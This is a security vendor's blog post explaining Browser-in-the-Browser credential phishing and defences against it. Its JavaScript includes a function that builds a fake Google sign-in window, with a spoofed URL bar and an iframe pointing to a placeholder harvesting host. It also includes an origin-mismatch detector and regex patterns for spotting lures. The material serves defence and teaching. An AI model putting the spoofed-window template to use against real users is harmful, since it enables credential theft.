In this blog:
- Brief summary of the recent BitB Attacks.
- Details on what makes BitB attacks hard to detect.
- The risks posed by these kinds of attacks.
- How to best defend against them.
On March 15, 2022, a pen tester with the handle “mr.d0x” published a blog post on his site demonstrating a new credential phishing technique that he called a “Browser in the Browser” (BitB) attack. This attack method gained some notoriety a couple of weeks later when the Ghostwriter campaign (attributed by Mandiant to the Belarusian Ministry of Defense) started using it to target Ukrainians. Beyond these attacks, BitB is a tactic that is likely to become increasingly prominent and be used by threat actors setting up credential skimming sites in the near future.
What is a BitB attack – and what makes it effective and hard to detect?
A BitB attack is essentially an in-page window that spoofs a legitimate sign-on pop-up (such as Google, Facebook, or Microsoft) in order to steal the credentials typed into it. In his write-up, “mr.d0x” explains how a malicious actor can script a pop-up on their own webpage so that it appears to have been opened by a legitimate login service.
There are two key elements to the way the script is set up. First, the fake window embeds (typically via an iframe) the credential harvesting page from wherever the threat actor is hosting it, so the form the victim types into is the attacker's. That page can of course be crafted to look almost identical to the legitimate sign-in page.
Credential skimming sites built to look like legitimate services are nothing new; what is interesting here is the second element. With a BitB attack, the actor also spoofs the window's title bar and URL bar so that they appear to show a legitimate domain. This is possible because what is displayed is not an actual browser URL bar, just HTML and CSS styled to look like one. Since it is not a real URL bar, the actor can write whatever they want there, padlock icon and the real provider's address included. The end result looks very close to the real thing:
If you look very carefully, you can see some differences between the real and fake URL bars, but these are not easy to spot in the wild (image source: mr.d0x).
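To make the two elements concrete, here is an added example (not mr.d0x's published template and not code from this post) that assembles a BitB window from its parts and then runs the one check the attacker cannot defeat from inside the page: the "URL bar" is text, while the form the victim types into is loaded from somewhere else, so the displayed origin and the loaded origin can be compared. All hostnames are assumed placeholders for attacker infrastructure, and the script runs under Node without a DOM.

```javascript
// Added example (not mr.d0x's template). Hostnames are placeholders.
const TOP_ORIGIN = "https://example-phish.test"; // assumed lure page hosting the fake window

// Attacker side. The title bar and URL bar are plain divs, so their text is
// arbitrary; the <iframe> is the only part that actually loads anything, and
// it points at the harvesting page, not at the provider whose URL is shown.
function buildBitbWindow({ title, spoofedUrl, harvestUrl }) {
  return `
<div style="position:fixed;top:120px;left:320px;width:480px;background:#fff;
            border:1px solid #ccc;border-radius:8px;box-shadow:0 8px 24px rgba(0,0,0,.3)">
  <div style="padding:6px 10px;background:#f3f3f3;font:13px sans-serif">${title}</div>
  <div style="padding:4px 10px;background:#eee;font:12px monospace">&#128274; ${spoofedUrl}</div>
  <iframe src="${harvestUrl}" style="width:100%;height:420px;border:0"></iframe>
</div>`;
}

// Defender side, step 1: the origins the page really embeds.
function iframeOrigins(html, topOrigin) {
  const origins = new Set();
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    try { origins.add(new URL(m[1], topOrigin).origin); } catch (_e) { /* unparsable src */ }
  }
  return origins;
}

// Step 2: URLs that appear as visible text. Tags are stripped first, so
// src="..." and href="..." attribute values never reach the matcher.
function visibleUrls(html) {
  const text = html
    .replace(/<script[\s\S]*?<\/script>/gi, " ")
    .replace(/<style[\s\S]*?<\/style>/gi, " ")
    .replace(/<[^>]+>/g, " ");
  return text.match(/https?:\/\/[^\s<>"']+/g) || [];
}

// Step 3: a visible URL whose origin is neither the page itself nor any frame
// it embeds is being displayed but not loaded. That is the BitB signature.
// It is a heuristic: an ordinary page that prints an un-hyperlinked URL in
// its text trips it too, which is the false-positive problem discussed below.
function auditForBitb(html, topOrigin) {
  const real = iframeOrigins(html, topOrigin);
  real.add(new URL(topOrigin).origin);
  const findings = [];
  for (const shown of visibleUrls(html)) {
    let origin;
    try { origin = new URL(shown).origin; } catch (_e) { continue; }
    if (!real.has(origin)) findings.push({ displayed: shown, loadedFrom: [...real] });
  }
  return findings;
}

// Constructed sample: a fake Google sign-in window whose form is served from
// an attacker host, embedded in the attacker's lure page.
const SAMPLE_BITB = buildBitbWindow({
  title: "Sign in - Google Accounts",
  spoofedUrl: "https://accounts.google.com/o/oauth2/v2/auth",
  harvestUrl: "https://login-cdn.example-phish.test/google.html",
});

// Constructed control: a page that legitimately frames the provider and never
// shows a URL as bare text.
const SAMPLE_LEGIT =
  '<p>Sign in with your <a href="https://accounts.google.com/">Google account</a>:</p>' +
  '<iframe src="https://accounts.google.com/o/oauth2/v2/auth"></iframe>';

console.log(JSON.stringify(auditForBitb(SAMPLE_BITB, TOP_ORIGIN), null, 2));
console.log(JSON.stringify(auditForBitb(SAMPLE_LEGIT, "https://app.example"), null, 2));
```

The audit reports the spoofed Google address for the BitB sample because nothing on that page is served from accounts.google.com, and reports nothing for the control. The same comparison is what a password manager does implicitly: it fills credentials for the origin the form is actually on, so it will not autofill a BitB window.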
How to Defend Against BitB Attacks
Since BitB windows are built from ordinary HTML, CSS and JavaScript that are not themselves malicious, it is hard to write a technical indicator for them that won't flood you with false positives. And because the fake window looks almost identical to the real sign-in pop-up, training employees to spot it by eye is unlikely to be effective. There are tells: the fake window cannot be dragged outside the browser's own viewport the way a real pop-up can, a password manager will not autofill into it because the form is on the wrong origin, and origin-bound credentials such as FIDO2/WebAuthn cannot be phished through it. But each of these depends on a user remembering to check, or on the organization having already deployed the control.
Fortunately for defenders, these attacks are part of a larger attack chain that we can disrupt.
Attack chain leading to a BitB attack:
Starting from the front and working back, we just mentioned that BitB attacks are hard to detect on their own. However, the fake window has to be hosted on a site somewhere, and up-to-date link/URL detections can catch some of these sites. Also, the link the user has to click on to reach the hosting site might look suspicious, raising red flags at the human level and stopping the attack. This gives some hope to defenders, but it is far from a panacea. The site hosting the BitB attack may be too new to have been added to a detection database, or the URL may look convincing enough to click on.
So: we should keep going up the chain.
This brings us to the lure. Something has to lure the victim to click on the link and visit the site hosting the BitB attack in the first place. In most phishing attacks, this tends to be an email message, social media post, or direct message in some other application (such as Slack, LinkedIn, or WhatsApp).
It's here, with the lure, that we can add extra layers of protection in the form of employee education and automated language analysis of incoming messages to the enterprise.
By implementing automated language analysis of the messages that employees are receiving, enterprises can add a key layer of protection.
If companies can automate the monitoring of 100% of employee communications, across all channels – and scan for the common markers of social engineering and phishing tactics – they will make themselves far more secure.
Employee education for identifying phishing attacks should already be standard; this automated language analysis is a key next step. The technology is an emerging one, but it should be central to enterprises defending themselves against the BitB attack.
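As an added illustration of what "scanning for the common markers of social engineering" can look like in practice, the following rule-based triage is not SafeGuard Cyber's engine or any code from this post; the marker lists, weights and threshold are assumptions chosen for the example, and the two messages are constructed. It scores a lure on the signals discussed above: urgency, a request to re-enter credentials, a link whose visible text names one site while its target is another, and a display name claiming a brand the sending domain does not belong to.

```javascript
// Added example: rule-based lure triage. Markers, weights and threshold are
// assumptions for illustration, not a vendor's detection logic.
const MARKERS = [
  { name: "urgency", weight: 2, patterns: [
    /\burgent(ly)?\b/i, /\bimmediately\b/i, /\bwithin (the next )?\d+ (hours?|minutes?)\b/i,
    /\bsuspended\b/i, /\bfinal (notice|warning)\b/i] },
  { name: "credential-request", weight: 3, patterns: [
    /\bverify your (account|identity|password)\b/i, /\b(re-?)?authenticate\b/i,
    /\bconfirm your (password|credentials|login)\b/i, /\bsign in (again|to continue)\b/i] },
  { name: "secrecy-or-bypass", weight: 2, patterns: [
    /\bdo not (tell|share|forward)\b/i, /\bkeep this (confidential|between us)\b/i,
    /\bskip (the )?(ticket|approval)\b/i] },
];
const BRANDS = /\b(google|microsoft|facebook|okta|slack)\b/i;
const HOLD_THRESHOLD = 5; // assumed: at or above this, hold the message for review

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (_e) { return null; }
}

// Registrable-domain approximation (last two labels). A real implementation
// would use the Public Suffix List; this is enough for the example.
function baseDomain(host) {
  return host ? host.split(".").slice(-2).join(".") : null;
}

function looksLikeUrl(text) {
  return /^(https?:\/\/)?[\w.-]+\.[a-z]{2,}(\/\S*)?$/i.test(text.trim());
}

// msg = { senderName, senderAddress, body, links: [{ text, href }] }
function scoreLure(msg) {
  const reasons = [];
  let score = 0;

  // Language markers in the body: one hit per category is enough.
  for (const m of MARKERS) {
    if (m.patterns.some((re) => re.test(msg.body))) { score += m.weight; reasons.push(m.name); }
  }

  // Link text that reads as one site while the href goes to another domain.
  for (const { text, href } of msg.links) {
    if (!looksLikeUrl(text)) continue;
    const shown = hostOf(text.includes("://") ? text : `https://${text}`);
    const actual = hostOf(href);
    if (shown && actual && baseDomain(shown) !== baseDomain(actual)) {
      score += 4; reasons.push(`link-mismatch: ${shown} -> ${actual}`);
    }
  }

  // Display name that claims a brand the sending domain does not belong to.
  const senderDomain = baseDomain(hostOf(`https://${msg.senderAddress.split("@").pop()}`));
  const claimed = BRANDS.exec(msg.senderName);
  if (claimed && senderDomain && !senderDomain.startsWith(`${claimed[1].toLowerCase()}.`)) {
    score += 3; reasons.push(`sender-brand-mismatch: "${msg.senderName}" from ${senderDomain}`);
  }

  return { score, reasons, verdict: score >= HOLD_THRESHOLD ? "hold-for-review" : "deliver" };
}

// Constructed messages: a BitB-style lure and a benign IT notice.
const SAMPLES = [
  { senderName: "Google Workspace Security", senderAddress: "alerts@mail-notify.example-phish.test",
    body: "Urgent: suspicious sign-in detected. Verify your account within 2 hours or it will be suspended.",
    links: [{ text: "accounts.google.com/signin", href: "https://login-cdn.example-phish.test/google.html" }] },
  { senderName: "Dana (IT)", senderAddress: "dana@corp.example",
    body: "Reminder: the VPN maintenance window is Saturday 02:00-04:00 UTC. No action needed.",
    links: [{ text: "status page", href: "https://status.corp.example/" }] },
];

for (const msg of SAMPLES) console.log(JSON.stringify(scoreLure(msg)));
```

The lure scores on all four signals and is held; the maintenance notice scores zero. Keyword rules like these are deliberately simple and will need tuning per organization, which is why the post treats language analysis as a layer alongside education rather than a replacement for it.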
Incidents like this teach us that companies should be more proactive about protecting their Slack instances and other third-party communication apps, since those are the channels through which a BitB lure arrives. Unfortunately, enterprises often remain lax about security in these channels. This is a huge oversight.
If you are interested in learning more about the SafeGuard Cyber solution, you can take a quick 5-minute tour.